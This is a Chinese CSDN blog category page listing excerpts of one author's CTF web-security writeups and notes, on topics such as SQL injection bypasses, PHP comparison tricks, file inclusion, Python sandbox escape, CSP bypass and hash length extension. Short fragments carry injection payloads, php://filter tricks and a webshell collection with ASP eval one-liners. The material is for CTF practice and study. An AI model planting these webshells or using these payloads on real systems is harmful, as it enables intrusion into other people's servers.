Web
文章平均质量分 79
Assassin__is__me
那些杀不死你的,终究会让你更加强大
展开
-
PHP函数漏洞集合
1.弱类型比较2.MD5 compare漏洞PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有0x01 md5(str) QNKCDZO 240原创 2017-07-16 17:34:33 · 4735 阅读 · 0 评论 -
CTF 中 Bash中的小技巧
1.绕过空格过滤bash中可以过滤的符号$IFS$9 ${IFS} %09 (符号需要php环境)2.命令分隔符这里介绍5种姿势1.%0a符号 换行符2.%0d符号 回车符3.;符号 在 shell 中,担任”连续指令”功能的符号就是”分号”4.&符号 & 放在启动参数后面表示设置此进程为后台进程,默认情况下,进程是前台进程,这时就把Shell给占据原创 2017-08-22 17:17:59 · 3348 阅读 · 0 评论 -
08067ctf 补题 Web Writeup
非常好的题目,套路少一些,学习多一些Web你能进入后台吗?非常有趣,这个不是套路了,直接提示存在index.php.bak,下载下来发现是一堆乱码,然后看第二个提示php-screw,看来代码是经过保护了 找到解密的代码 https://github.com/firebroo/screw_decode 并且密码都告诉了,应该是没什么问题的 然后就是漫漫的尝试的道路…真是坑死了… 建议还原创 2017-11-02 02:04:05 · 2476 阅读 · 0 评论 -
python沙箱逃逸小结
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下 首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情 我们输入dir('builtins')发现如下 我们在python的object类中集成了很多的基础函数,我们想要调用的时原创 2017-11-11 03:25:26 · 8611 阅读 · 2 评论 -
Padding oracle attack!
终于补题补到了这个题目!这个也是非常经典的问题了,但是一直没有搞明白,之前鸡哥的讲解已经非常清楚了,忍不住还是想佩服一下4ction。下面还是大概讲一下这个Padding oracle attack到底是个啥,这里采用白帽子上的讲解方式就很好了!1.基础知识(1)padding由于CBC是块密码工作模式, 所以要求明文长度必须是块长度的整数倍. 对于不满足的数据, 会进行数据填充到满足整数倍.原创 2017-11-09 01:59:58 · 1689 阅读 · 0 评论 -
Webhacking writeup By Assassin [随便玩一玩]
果真是webhacking,申请账号都这么有逼格^_^用burp抓包发现源码访问如下 还有什么decode me需要三次解码base64即可得到一个ip值即可,然后就可以开始我们的挑战啦!第一关上来得到代码<?if(!$_COOKIE[user_lv]){SetCookie("user_lv","1");echo("<meta http-equiv=refresh content=0>")原创 2017-09-14 16:24:13 · 2691 阅读 · 0 评论 -
某校赛的题解...再膜鸡哥
真是菜的一逼…WEB生疏了小小总结一下。 两道0ctf的原题0ctf Temmo’s Tiny Shop part1打开了首先发现了再搜索的order位置存在过滤Waf,感觉是一个注入,但是只是一个猜想,但是感觉过滤的东西实在是太多了…以为思路错了…转而一想是不是买和卖的条件竞争呢?但是一开始一直卡在同一用户为啥不行????然后换了个套路用不同的套接字就行了…用两个cookie,gg,我用的两原创 2017-10-02 09:25:10 · 1104 阅读 · 2 评论 -
wargame v2.1 Web Wrtteup By Assassin
只有周末可以做一做来着already gotFLAG:3f271a824852c299e2aa7dde0f3d1d6150527cc9QR Code Puzzle首先看到一个这玩意 蒙蔽了,难道是拼图… 肯定不是自己去拼…找源码看到了图片的位置 http://wargame.kr:8080/qr_code_puzzle//img/qr.pngFlag is : e0b5b5c5939d3a原创 2017-09-02 21:49:30 · 1470 阅读 · 0 评论 -
GCTF 2017 Web 补题 By Assassin [持续更新--抄大佬wp]
热身题直接扫描目录发现了robots.txt http://218.2.197.232:18001/rob0t.php-----------------------Congratulation!---------------------------GCTF{ae609880185f1d75}Forbidden加上'X-Forwarded-For':'localhost' 加上'HOST':'原创 2017-09-09 22:11:36 · 1895 阅读 · 0 评论 -
报错注入的一些整理 By Assassin
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se转载 2017-01-29 15:44:34 · 1250 阅读 · 0 评论 -
MCTF Web 的一些题目
之前本来写好了博客自己给删了…mmp,简单在记录一下思路注入正传打开是一个登陆页面,尝试了一下,如果被过滤会提示”hacker?”,然而感觉过滤的并不多 但是这个题的难点是在于注入的当前表没有数据,所以无论怎么闭合都是username error猜测是select * from users where username='$username' and password='$password'构造原创 2017-11-20 22:25:26 · 636 阅读 · 1 评论 -
注入的花式绕过姿势--向鸡哥学习
打了一次比赛,大佬们都说简单,我却什么都做不出来,真心受伤的一逼,是时候学习一波大佬的经验了,本次主要想要抄袭一下鸡哥的what a fuck总结,嗯嗯.1.WAF绕过姿势(1)大小写绕过SQL语句中对大小写没有限制,但是PHP中函数经常对大小写敏感,所以用到的地方较少。(2)双关键字有一种waf保护的方法是删除select 、 union等关键字,所以有时用两遍可原创 2017-07-16 11:43:53 · 3471 阅读 · 12 评论 -
实验吧 加了料的报错注入 再见报错注入
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users原创 2018-01-31 20:13:38 · 1999 阅读 · 3 评论 -
实验吧 认真一点!
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这原创 2018-01-31 17:59:49 · 3117 阅读 · 0 评论 -
LCTF Web补题笔记(菜狗前进永不止步)
不得不说比赛真的挺难得…补题吧…Simple blog首先上来发现文件login.php和admin.php,但是没什么别的,想到文件泄露通过swp得到源码login.phperror_reporting(0);session_start();define("METHOD", "aes-128-cbc");include('config.php');function原创 2017-11-20 21:52:30 · 5208 阅读 · 1 评论 -
各种小马小结
最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新ASP<%eval request("sb")%><%execute request("sb")%><%execute(request("sb"))%><%execute request("sb")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("sb")%><%execut原创 2017-08-31 11:12:43 · 9085 阅读 · 0 评论 -
Webshell的小艺术
做了一期湖湘杯,有一道专门利用webshell构造的题目,觉得还是挺受启发的,2333前面专门总结过简单的常用的webshell,虽然不全但是很多比赛也是够用了,但是这里就是不行啦! http://blog.csdn.net/qq_35078631/article/details/77743794下面讲一下集中比较高级一些的webshell的制作方法,主要还是PHP的,其中包括一些小的思路、也包括原创 2017-11-26 01:28:08 · 565 阅读 · 0 评论 -
湖湘杯 2017 复赛Web部分题解
WebWeb200文件上传一开始真的以为是文件上传,后面发现是骗人的,简单的文件包含,扫描发现存在flag.php payloadhttp://118.190.87.135:10080/?op=php://filter/convert.base64-encode/resource=flag 解密得到flag<?php $flag="flag{c420fb4054e91944a71ff68f70原创 2017-11-25 23:07:32 · 3395 阅读 · 0 评论 -
过滤列名如何注入dump数据
这是一个非常神奇的东西,在做LCTF中大牛提及的DDCTF2017中的一个题目,废话不多少,直接放出来效果及其利用语句mysql> select * from (select 1)a,(select 2)b,(select 3)c;+---+---+---+| 1 | 2 | 3 |+---+---+---+| 1 | 2 | 3 |+---+---+---+1 row in set原创 2017-11-21 10:43:30 · 775 阅读 · 0 评论 -
SniperOJ Web by Assassin
md5-vs-injection好久不做题了 肯定是文件泄露了,猜测容易得到index.phps泄露文件,然后看一下是啥<?php$flag = 'SniperOJ{********************}'; if(isset($_POST['password'])){ $current_password = "QNKCDZO"; $password原创 2017-09-02 12:41:59 · 3127 阅读 · 0 评论 -
NJCTF2017 线上赛 web 题解 By Assassin
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是题目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本题的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload:username=admin原创 2017-03-18 09:51:25 · 7108 阅读 · 0 评论 -
CTF-练习平台 Web writeup By Assassin [暂时完结]
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#原创 2017-04-06 23:14:59 · 71083 阅读 · 4 评论 -
CSP策略及绕过方法
XSS的时候经常要绕过CSP,通过网上的资料进行学习CSP策略一个CSP头由多组CSP策略组成,中间由分号分隔,就像这样:Content-Security-Policy: default-src 'self' www.baidu.com; script-src 'unsafe-inline'其中每一组策略包含一个策略指令和一个内容源列表一、常用的策略指令:default-srcdefault-sr转载 2017-06-26 10:45:31 · 9943 阅读 · 0 评论 -
ISCC 2017 部分解题记录 By Assassin
Basic 50 Wheel Cipher加密表:1: < ZWAXJGDLUBVIQHKYPNTCRMOSFE <2: < KPBELNACZDTRXMJQOYHGVSFUWI <3: < BDMAIZVRNSJUWFHTEQGYXPLOCK <4: < RPLNDVHGFCUKTEBSXQYIZMJWAO <5: < IHFRLABEUOTSGJVDKCPMNZQWXY原创 2017-06-04 09:27:30 · 4621 阅读 · 2 评论 -
利用burpsite和sqlmap进行post注入
尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)http://120.24.86.145:8002/chengjidan/第一步 用burpsite抓包并保存成txt第二步 用sqlmap语句sqlmap -r 保存的txt文件 -p 需要注入的变量然后我们的注入语句为python sqlmap.py -r C:\Users\Assassin\Desktop\inp原创 2017-06-05 11:20:09 · 4899 阅读 · 0 评论 -
第三届全国网络空间安全技术大赛 Web补题 By Assassin(持续更新)
最近比较忙,可能补题的速度慢一些些~签到题首先进入界面发现如下代码 然后就知道用==弱匹配,构造一个纯数字串和一个纯字母串,让他们的MD5值形如0exxx且0e后面全是纯数字。就构成科学记数法0==0,payloadUsername:QNKCDZOpassword:240610708进去后发现还有一个简单的绕过 我们看到又是==,有一个参考表,大家一看便知~ post的payload构造如下原创 2017-04-20 17:29:50 · 3856 阅读 · 0 评论 -
百度杯 二月场web-include By Assassin [文件包含漏洞]
打开题目链接可以看到这就是典型的文件包含漏洞(当然题目中也是告诉你了,就是文件包含漏洞),之前不是很了解文件包含漏洞是什么,在这里实现了一下。大概找了一下,有位大哥小小总结了一下技巧1.基本的文件包含漏洞:code : * 包含同路径下的文件:?file=.htaccess* 路径遍历:?file=../../../../../../../../../var/lib/locate.db(原创 2017-03-17 00:33:33 · 1383 阅读 · 1 评论 -
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?phpinclude "flag.php"; //包含flag.php这个文件$a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值if(!preg_match('/^\w*$/',$a )){ //正则原创 2017-03-16 23:41:14 · 22585 阅读 · 0 评论 -
实验吧 登陆一下好吗?? 简单注入 By Assassin
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。但是and ‘什么的都没有过滤!payload真的简单到淫荡,看一下就是这样的 admin-> ‘=’ password-> ‘=’ 真是醉了,为原创 2017-01-30 11:33:07 · 6397 阅读 · 2 评论 -
实验吧 who are you? By Assassin 时间盲注
说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:Client-IPx-remote-IPx-originating-IPx-remote-addr但是这里当然是还是用X-FO原创 2017-01-29 21:07:53 · 6821 阅读 · 7 评论 -
i春秋-2016-2017年信息安全竞赛 Web writeup 补题 By Assassin
从i春秋上补一补题目,玩了一个假期了,况且也没人疼没人爱的,做题吧…破译首先看到了两拖密文TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88原创 2017-08-08 21:10:37 · 3160 阅读 · 0 评论 -
文件包含小总结 By Assassin
这么长时间对文件包含都不甚了解,小小总结一下 文件包含大致分为本地包含和远程包含,这里先用include讲解吧。事实上扩展函数一大堆 在本地包含的时候,如果没有php代码,包含文件会把文件内容输出;如果存在php文件,或者包含了远程的恶意程序,当前代码就会引用执行包含的程序。1. 普通本地文件包含<?php include("inc/" . $_GET['file']); ?>然后就可以遍历原创 2017-08-03 17:02:25 · 472 阅读 · 0 评论 -
南京邮电CTF 后面的几个WEB题目 By Assassinh
之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题sql injection 4F12打开源码,关键代码如下#GOAL: login as admin,then get the flag;error_reporting(0);require 'db.inc.php';function clean($str){ if(get_magic_quot原创 2017-08-10 19:00:14 · 1383 阅读 · 0 评论 -
X-NUCA 2017 Web练习 By Assassin
还差一个 题目链接如下 http://www.hetianlab.com/pages/activity/X-NUCANationalTL2017.jsp捉迷藏一看发现一大坨东西,但是都没用发现有一个链接 打开隐约会闪一下回到index.php,说明是个重定向,burp抓包得到flag FLAG{th!5!5n0tth3fl@g}简单问答真是搞不懂这题是几个意思…首先看到页面,貌似是个简答原创 2017-08-21 10:31:58 · 2815 阅读 · 0 评论 -
Wechall writeup By Assassin
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_import mathdef is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret原创 2017-08-25 22:35:41 · 15567 阅读 · 1 评论 -
jarvis oj Web By Assassin
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l原创 2017-08-22 01:12:26 · 8685 阅读 · 1 评论 -
X-NUCA 联赛小结 By Assassin
碰到了X-NUCA联赛,索性搅屎一发,自己一队能力有限,感谢身边高手的提醒。总体说比赛形式真是很不错,但是就是服务器太渣了…动不动502什么的,这里简单总结一下把第一关http://f3e6cc87187fe797bf8c89e7688c1039.xnuca.cn/index.php不知道是个什么玩意,连七八糟试试,最后 flag:xnuca{921e440934d87e45f37e3ec2081原创 2017-08-27 09:49:51 · 1685 阅读 · 0 评论 -
用MD5实现hash长度扩展攻击 By Assassin
今天心血来潮,看到了扩展攻击,猛然想到了之前看的扩展攻击的原理还没有弄懂,这里补充一下,hash长度扩展攻击到底是怎么实现的。题目首先从实验吧上面见到的经典的题目,下面给出源码<?php $flag = "flag{flag is here}";$secret = "aaaaabbbbbccccc"; // This secret is 15 characters long for securit原创 2017-04-28 21:48:11 · 10509 阅读 · 0 评论 -
prompt(1) to win -----XSS学习笔记
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext原创 2017-08-13 10:56:16 · 10903 阅读 · 2 评论 -
Seacms漏洞分析利用复现 By Assassin
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示===-------------------------------------【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼原创 2017-08-03 13:13:57 · 9843 阅读 · 2 评论